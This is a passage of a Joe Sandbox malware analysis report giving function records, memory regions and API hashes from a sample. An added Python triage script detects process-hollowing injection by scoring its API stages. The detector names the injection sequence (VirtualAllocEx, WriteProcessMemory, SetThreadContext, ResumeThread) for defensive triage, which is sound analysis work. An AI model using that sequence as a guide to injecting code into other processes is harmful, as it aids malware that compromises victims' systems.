                        • Nodes: 289 [100a790-100b8a0]; 291 [100b8a2-100b8a5]; 292 [100b8a8-100b8d7] calls LoadLibraryExW; 293 [100b8e0-100b8fd]; 294 [100b8d9-100b8df]
                        • Edges: 289->291, 289->292, 291->292, 292->293, 292->294, 294->293
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0100B6D9,00000800,00000000,00000000), ref: 0100B8CA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: d28ac4934a73edca31076e7151461de6cbb2de57b8e3e5be977fa058db7f5308
                        • Instruction ID: 6701f3b564c136fcab57295b9a8a5ffe94430e944a50e79a40d4aad706557d95
                        • Opcode Fuzzy Hash: d28ac4934a73edca31076e7151461de6cbb2de57b8e3e5be977fa058db7f5308
                        • Instruction Fuzzy Hash: 291103BA9002099FEB10CF9AC444A9EFBF5EB88320F14846AE559A7250C3B5A545CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07825F46
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9354060e69e2f8643d17b5a0013702b813bb749128fc743278d75b269da4932a
                        • Instruction ID: 4313b7d98d36d9ce38d2477ac36b6e521a0eee9b5e6574db67d8519a0acde2bf
                        • Opcode Fuzzy Hash: 9354060e69e2f8643d17b5a0013702b813bb749128fc743278d75b269da4932a
                        • Instruction Fuzzy Hash: 551126729002499FDF10DFAAC845BDFBBF5EF88320F148819E619A7250C775A954CBA1
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: c72452ee0c249e21dd6da4e9eeb35d0407d6c8d7d6072a93d3fc50731160afbf
                        • Instruction ID: 6d824579660a057044d58b44fb3c5e16d285bc17c3b36b2526e4e6501d026190
                        • Opcode Fuzzy Hash: c72452ee0c249e21dd6da4e9eeb35d0407d6c8d7d6072a93d3fc50731160afbf
                        • Instruction Fuzzy Hash: 72118BB1D003498FDB10DFAAC4457EEFBF4EF88320F24841AD519A7240CB74A945CBA4

                        Control-flow Graph
                        • Nodes: 297 [100b858-100b8a0]; 298 [100b8a2-100b8a5]; 299 [100b8a8-100b8d7] calls LoadLibraryExW; 300 [100b8e0-100b8fd]; 301 [100b8d9-100b8df]
                        • Edges: 297->298, 297->299, 298->299, 299->300, 299->301, 301->300
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0100B6D9,00000800,00000000,00000000), ref: 0100B8CA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f34cc1bcd603a71b5dfd6bf363e0cc84050cdf0f708d579590376ef69e8582da
                        • Instruction ID: 6d94ddd6240af8d4f1631d3b4c699c9bee834481b073846b5085088ae46c7d1d
                        • Opcode Fuzzy Hash: f34cc1bcd603a71b5dfd6bf363e0cc84050cdf0f708d579590376ef69e8582da
                        • Instruction Fuzzy Hash: 321114B6D002498FDB10CFAAC444ADEFBF5EF88310F14846AD559A7250C3B4A545CFA4
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5ebb297b0f79aab4287050ad62a9db2283cbc857e0b64aba9605d8e952488d30
                        • Instruction ID: 5e4e0ad315c3e58a926a0c4ed623bc9e19bddf696306cff6fd45dad86e1c0259
                        • Opcode Fuzzy Hash: 5ebb297b0f79aab4287050ad62a9db2283cbc857e0b64aba9605d8e952488d30
                        • Instruction Fuzzy Hash: 93116AB1D003498FDB10DFAAC4457AFFBF5EF88720F24841AD519A7240CB75A944CB94
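                        The function records above from the 07820000 region (a region Joe Sandbox marks "based on PE: false", i.e. dynamically allocated rather than image-backed) are where the API calls behind the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures live: ReadProcessMemory, VirtualAllocEx, Wow64SetThreadContext and ResumeThread. The following is an added triage example, not part of the Joe Sandbox report or of the sample: a Python parser for these function records that groups API evidence per memory-dump region and scores the stages of the suspended-process injection (hollowing) pattern. The ResumeThread records carry no API call line, only an "API ID", so the parser also resolves that field; the token-subset rule it uses (the ID appears to be the API name's CamelCase tokens with verb and suffix tokens dropped, e.g. ContextThreadWow64 for Wow64SetThreadContext) is an observation from this page, not a documented Joe Sandbox algorithm, and cannot tell Get from Set variants. WriteProcessMemory is listed as a stage so that its absence from this excerpt shows up explicitly. The embedded sample is a constructed, abbreviated excerpt of the records printed on this page.

```python
import re

# Constructed, abbreviated excerpt of the function records on this page
# (one record per function; field layout as Joe Sandbox prints it).
SAMPLE_RECORDS = """\
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07825E7E
Memory Dump Source
• Source File: 0000000A.00000002.2267102218.0000000007820000.sdmp, Offset: 07820000, based on PE: false
• API ID: ContextThreadWow64
• Instruction Fuzzy Hash: E62149B1
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07826108
Memory Dump Source
• Source File: 0000000A.00000002.2267102218.0000000007820000.sdmp, Offset: 07820000, based on PE: false
• API ID: MemoryProcessRead
• Instruction Fuzzy Hash: DA214AB1
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07825F46
Memory Dump Source
• Source File: 0000000A.00000002.2267102218.0000000007820000.sdmp, Offset: 07820000, based on PE: false
• API ID: AllocVirtual
• Instruction Fuzzy Hash: 69218872
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0100B6D9,00000800,00000000,00000000), ref: 0100B8CA
Memory Dump Source
• Source File: 0000000A.00000002.2258921808.0000000001000000.sdmp, Offset: 01000000, based on PE: false
• API ID: LibraryLoad
• Instruction Fuzzy Hash: 291103BA
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2267102218.0000000007820000.sdmp, Offset: 07820000, based on PE: false
• API ID: ResumeThread
• Instruction Fuzzy Hash: 72118BB1
Memory Dump Source
• Source File: 0000000A.00000002.2266258724.0000000007580000.sdmp, Offset: 07580000, based on PE: false
• API ID:
• Instruction Fuzzy Hash: 4362C2B0
"""

BULLET = r"^[•*-]?\s*"
API_LINE = re.compile(BULLET + r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SRC_LINE = re.compile(BULLET + r"Source File:.*?Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)")
APIID_LINE = re.compile(BULLET + r"API ID:\s*(?P<id>\S*)")
FUZZY_LINE = re.compile(BULLET + r"Instruction Fuzzy Hash")


def parse_records(text):
    """Split report text into function records. A record opens at an 'APIs' or
    'Memory Dump Source' header and closes at its 'Instruction Fuzzy Hash' line,
    so a 'Memory Dump Source' header inside an open record does not split it."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if cur is None:
            if line in ("APIs", "Memory Dump Source"):
                cur = {"apis": [], "offset": None, "pe_backed": None, "api_id": ""}
            continue
        if (m := API_LINE.match(line)):
            cur["apis"].append((m["api"], m["mod"], m["ref"]))
        elif (m := SRC_LINE.match(line)):
            cur["offset"] = m["off"].upper()
            cur["pe_backed"] = m["pe"].lower() == "true"
        elif (m := APIID_LINE.match(line)):
            cur["api_id"] = m["id"]
        elif FUZZY_LINE.match(line):
            records.append(cur)
            cur = None
    return records


def camel_tokens(name):
    """CamelCase tokens of an API name or a Joe Sandbox API ID."""
    return set(re.findall(r"[A-Z][a-z0-9]*", name))


def api_matches(record, api_name):
    """True if the record calls api_name directly, or if its API ID resolves to it.
    Assumption observed on this page: the ID is the API's CamelCase tokens minus
    verb/suffix tokens (Wow64SetThreadContext -> ContextThreadWow64), so a token
    subset test resolves it; Get/Set variants are indistinguishable this way."""
    if any(api == api_name for api, _, _ in record["apis"]):
        return True
    id_tokens = camel_tokens(record["api_id"])
    return bool(id_tokens) and id_tokens <= camel_tokens(api_name)


# Stages of the suspended-process injection pattern the report's signatures name.
HOLLOWING_STAGES = {
    "read_target": ("ReadProcessMemory",),
    "allocate": ("VirtualAllocEx",),
    "write": ("WriteProcessMemory",),
    "set_context": ("Wow64SetThreadContext", "SetThreadContext"),
    "resume": ("ResumeThread",),
}


def hollowing_evidence(records):
    """Per memory-dump region: whether it is image-backed and which stages appear."""
    evidence = {}
    for region in sorted({r["offset"] for r in records if r["offset"]}):
        in_region = [r for r in records if r["offset"] == region]
        evidence[region] = {
            "pe_backed": any(r["pe_backed"] for r in in_region),
            "stages": {stage: any(api_matches(r, api) for r in in_region for api in apis)
                       for stage, apis in HOLLOWING_STAGES.items()},
        }
    return evidence


def flag_regions(records, min_stages=3):
    """Regions showing at least min_stages of the pattern, sorted by address."""
    return [region for region, ev in hollowing_evidence(records).items()
            if sum(ev["stages"].values()) >= min_stages]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for region, ev in hollowing_evidence(recs).items():
        present = [s for s, ok in ev["stages"].items() if ok]
        print(f"{region} pe_backed={ev['pe_backed']} stages={present}")
    print("flagged:", flag_regions(recs))
```

                        Run against the full "Execution Graph" section of a report, the parser makes the missing stage visible (here, no WriteProcessMemory record in the excerpt), which tells the analyst to look for it in another region or in the API call trace rather than assume it; the 07580000 and 01000000 regions contribute nothing to the pattern and are left unflagged.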
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 078295E5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 2ce680db287b1029ab8af60535c5d138e94739d9b24f2c001abe77b406b0dfdd
                        • Instruction ID: af612b8a81463957d152a8cea08f901d8b39764dc1ae53e8dc2d6ae00c587c1b
                        • Opcode Fuzzy Hash: 2ce680db287b1029ab8af60535c5d138e94739d9b24f2c001abe77b406b0dfdd
                        • Instruction Fuzzy Hash: 111125B5900349DFCB10DF99C584BDEBBF8EB48324F108419E619A7200C3B5A984CFA0
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B65E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258921808.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_1000000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: d7002561c3a8ada55f175a50937c5dc280f9a820527490f7c469ddb4091a4e15
                        • Instruction ID: 3c188952010ea2af03e8886fb3d627c874779089ba314c34b055991261f13f0b
                        • Opcode Fuzzy Hash: d7002561c3a8ada55f175a50937c5dc280f9a820527490f7c469ddb4091a4e15
                        • Instruction Fuzzy Hash: D4110FB6C006498FDB10CF9AC844A9EFBF4EF88224F10846AD959A7250C3B9A545CFA1
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 078295E5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2267102218.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7820000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: eb5cc566284d273234348cf8bfabdb0f194478af97a459faedc704baf6591d7d
                        • Instruction ID: 00708488adeb4d4bd6d85cfc4f537892feb924cca1d9005468ee97ae57dfa2f2
                        • Opcode Fuzzy Hash: eb5cc566284d273234348cf8bfabdb0f194478af97a459faedc704baf6591d7d
                        • Instruction Fuzzy Hash: DA1103B5800349DFDB10CF9AC585BDEBBF8EB48320F10841AE559A7600C3B5A984CFA1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b82f3bfb9a3e3f9b361d4387dae95b562705a1a2d17c9fe5e0d26ae398fa6557
                        • Instruction ID: e681fdb312ccdb24e07fb4ead4d88957f661a2493eea2fd30d228afa5d62ce84
                        • Opcode Fuzzy Hash: b82f3bfb9a3e3f9b361d4387dae95b562705a1a2d17c9fe5e0d26ae398fa6557
                        • Instruction Fuzzy Hash: 4362C2B0E01B428BD7B46F7494883EE76D1BB45309F614A1FD1AEDB390DB349886CB16
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30b388d57facd11b1703344a352c39a0cfdfd60a47a83168ce5dfb1693423fa0
                        • Instruction ID: 674d851ec759cbff1198922d3af318fb7a1368722957b6ac748c380aa9dd6680
                        • Opcode Fuzzy Hash: 30b388d57facd11b1703344a352c39a0cfdfd60a47a83168ce5dfb1693423fa0
                        • Instruction Fuzzy Hash: DD223BF0905B434BD7B46BA484843DE7AD0BB06219F714A5BC0FE9A395DB34988ACB49
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1a98f34abe317d110a9f6763d67c1955f3d03f3d84da48cc01a5318a5e8c105
                        • Instruction ID: 1f869f855c9f5b45c873566ceb9a2031edf2d9ef3827c035360e3aab59179e98
                        • Opcode Fuzzy Hash: c1a98f34abe317d110a9f6763d67c1955f3d03f3d84da48cc01a5318a5e8c105
                        • Instruction Fuzzy Hash: AF9166753006048FD345FB78D8586AEB7E7EFC9300F118528E50A9B359EF38A946DB91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ef6401f85cd2f163987e292d9438fa5aea64775b01660487a8dda5db6ec8c7b
                        • Instruction ID: b6ace1c0dcc4a6e60cd3484166ad177538a2f263236b61abb03b376404280419
                        • Opcode Fuzzy Hash: 6ef6401f85cd2f163987e292d9438fa5aea64775b01660487a8dda5db6ec8c7b
                        • Instruction Fuzzy Hash: 5151B2B1A003199FDB44EFA9D8446AFBFEAFFC8210F10846AE505E7350DB349905CBA5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 125b7349a173830d8b5ebc86cfed65d25e063ced83713db7a083d9ebe1e9f07b
                        • Instruction ID: f01974d3d4c857b600731580b4c01e562d6e49cc1774d4a3375aa04dc31580f9
                        • Opcode Fuzzy Hash: 125b7349a173830d8b5ebc86cfed65d25e063ced83713db7a083d9ebe1e9f07b
                        • Instruction Fuzzy Hash: 6E515E35B001148FE754EBB4D854B6B7BE3FB98710F208029E606EB39ADE349C42DB91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 22274a0968c0245f647abab9ec55aa5483b006c58fd106c27bf8657db6fa03ef
                        • Instruction ID: d8d5cb00ba0ef3221bc46aefaaf08b342ce9ff31cba49461127876575ba7e43f
                        • Opcode Fuzzy Hash: 22274a0968c0245f647abab9ec55aa5483b006c58fd106c27bf8657db6fa03ef
                        • Instruction Fuzzy Hash: E851A171B002068FDB15EB799C449BEBBFAFFC4260B14852AE425DB391DF309D0687A1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47726300a618c496961bfe7b495beb85e1e4a50a522383d844febb6952662d70
                        • Instruction ID: 994fd942172c5c725a5d13c0c572b102ed6b5822063fbcbd12f6e5389582d447
                        • Opcode Fuzzy Hash: 47726300a618c496961bfe7b495beb85e1e4a50a522383d844febb6952662d70
                        • Instruction Fuzzy Hash: 6151EDB4E29209DFCB80EFA9D4809EDBBB5FB4E340F405856E456B7311D734A951CB50
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54f2878233299a6e7b03ee6a16a3749187ded3ae570ac82402b8b64ce6dae464
                        • Instruction ID: 675c03a32adce58d114de654600491c9ba1782f43e8039c5caf553c28521a851
                        • Opcode Fuzzy Hash: 54f2878233299a6e7b03ee6a16a3749187ded3ae570ac82402b8b64ce6dae464
                        • Instruction Fuzzy Hash: 4251D9B4E2520ADFCB80EFA9D4849EDBBB5FB0E240F80585AE856B7311D734A851CB54
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b6ddc4ec868a672aee2db201afd6526e213c620ad7cd4dfe609c95679d8fc9a7
                        • Instruction ID: b69647127bb2fa6b699f48861bf1bee3f3c845a48c4a48e885798496c1ba285f
                        • Opcode Fuzzy Hash: b6ddc4ec868a672aee2db201afd6526e213c620ad7cd4dfe609c95679d8fc9a7
                        • Instruction Fuzzy Hash: BB41C2B4D19259CFDB50EFA9D884AFDBBF9BB4A310F146415E40AB7251D734A941CF00
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ec7544b77c5f663695049d230c10224eaea503434df6af7d2c5a2e2d4b64536
                        • Instruction ID: cac6179a1a89c9af4609f4ffbab2154614898e17dd69900cb6af39ebae014a66
                        • Opcode Fuzzy Hash: 4ec7544b77c5f663695049d230c10224eaea503434df6af7d2c5a2e2d4b64536
                        • Instruction Fuzzy Hash: 61410AB4E18209CFDB88DFA9D4406EEBBF6BB8E301F14D56AD419B3292D7344941CB60
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 490e7295f464e72dba3a797936947898c675d82c6ceb2646dc68ca4ac348873a
                        • Instruction ID: 79f07c9820766b6e0e745c70e7b428cf7919ccbf3d771a46fa000b26ae185ea9
                        • Opcode Fuzzy Hash: 490e7295f464e72dba3a797936947898c675d82c6ceb2646dc68ca4ac348873a
                        • Instruction Fuzzy Hash: B94152B4D29619CFD784EF5AD444AF9BBF9FF4E300F819895D019AB216D730A855CB00
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f42c29baa5d8b671ae9c935f61d40402754b3287c4df91a28360a708790d0c3
                        • Instruction ID: 321bbb6dd074f6053c9e1449c4e6329cc37de4e2742313a3a7e4ff507d7cd45b
                        • Opcode Fuzzy Hash: 2f42c29baa5d8b671ae9c935f61d40402754b3287c4df91a28360a708790d0c3
                        • Instruction Fuzzy Hash: 4F41B476A042159FCB42EFA8D9409DFBFB5FB89210F1440ABE046E7252D7345D46CBB1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b7315b7c5d390d85d25e0e8c98dc5ecdbad2aa8d2617bd50c355e10bc1cc77a4
                        • Instruction ID: b42d2d46f2111bca3d2efcee7f89cdc13cb03e339585141326ad1b5dbc19ce88
                        • Opcode Fuzzy Hash: b7315b7c5d390d85d25e0e8c98dc5ecdbad2aa8d2617bd50c355e10bc1cc77a4
                        • Instruction Fuzzy Hash: CD417DB1A001198FEB81EBA4D8516EFBBF6FBC8714F10806AE505E7389D7345D06DBA0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df563fd082fa5352b925507fc8c7647376385acde38b61a4da069465d0c775ce
                        • Instruction ID: 9ea8936f95fcdcb53d77abecab3fbf9978553d5a7447957a93755e40b64bb884
                        • Opcode Fuzzy Hash: df563fd082fa5352b925507fc8c7647376385acde38b61a4da069465d0c775ce
                        • Instruction Fuzzy Hash: 654131B4D29619CFD784EF5AD444AF9BBF9FF4E300F819895D019AB216D730A954CB00
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55fd75ecf0835ffe48e26421d9bdbd9f128b973ec873a45ee110ed605c14c8f3
                        • Instruction ID: c7cdc23ecb490c5df375d63c3b701ecb7afddfb511c3295d57449f0991091599
                        • Opcode Fuzzy Hash: 55fd75ecf0835ffe48e26421d9bdbd9f128b973ec873a45ee110ed605c14c8f3
                        • Instruction Fuzzy Hash: 4C21B276B106058FDB59EB38D85499D37E5AFC965071540AED505CB360DF31DC02CBA0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55eff6b0a9e4db9e464b0b33ef9c477d87e6c1f259430fed3c7e2e3344e3bb5e
                        • Instruction ID: 4b42608056ecb5fe8ffc39f0bdeacf02da638cc44525f6dffa00daca11cdafc8
                        • Opcode Fuzzy Hash: 55eff6b0a9e4db9e464b0b33ef9c477d87e6c1f259430fed3c7e2e3344e3bb5e
                        • Instruction Fuzzy Hash: DB3102B1D01258DFEB60DF99D984BDEBBF8FB48720F24801AE409B7250C7B55845CBA1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258362022.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_f9d000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6f96317dd25e5bc9d4f667cfcefa889a8c72b017bb08d803d1e306cfafbc9fe
                        • Instruction ID: 8b854118a37d2e3c321ba6b458573990096c4a80922f4a05d98f51dd3f33be84
                        • Opcode Fuzzy Hash: c6f96317dd25e5bc9d4f667cfcefa889a8c72b017bb08d803d1e306cfafbc9fe
                        • Instruction Fuzzy Hash: FD212676904304EFEF05DF14D9C0B26BB65FB84324F30C5ADE9094B252C776D846DA61
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2258362022.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_f9d000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f9a3a248f0357165ea408ccbf4be68f7ada5932704e91d413732035d9a5769f
                        • Instruction ID: 2089cbc7f287e25986d8615e08759cb8b572f0b28d84e3b073b742097aaab464
                        • Opcode Fuzzy Hash: 6f9a3a248f0357165ea408ccbf4be68f7ada5932704e91d413732035d9a5769f
                        • Instruction Fuzzy Hash: F321F276504204EFEF04DF18D9C0F26BBA5FB84324F34C56DE9094B296C77AD846DA62
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d60f3c84f81959417c89bc18acb74578f37a997bb93fefc8571eccfc5e710440
                        • Instruction ID: f67fa0b49d5ba7b34b4a9378b71a27d17a0303fe573f867ca24f0d89424dc3d3
                        • Opcode Fuzzy Hash: d60f3c84f81959417c89bc18acb74578f37a997bb93fefc8571eccfc5e710440
                        • Instruction Fuzzy Hash: 5111B1B5609344AFDB45EB74DC556ADBBF8EF46200B1485EBE805D7242EA309D06CB32
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 280db7e6afbe14e5329273fed8f7c49cd933c7a9b36e2c51eb7319a51a852582
                        • Instruction ID: 56e312bf8f39ce5bcafd3dbbb7910686653a64b30c5d001f7518c8fd65daf0e0
                        • Opcode Fuzzy Hash: 280db7e6afbe14e5329273fed8f7c49cd933c7a9b36e2c51eb7319a51a852582
                        • Instruction Fuzzy Hash: C321E4B5B047489FD705FB65C810B9A7BB6FF8A300F1180A6D506AB2A6DE35DC01CB81
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2266258724.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_7580000_xNgpESfQOvfb.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
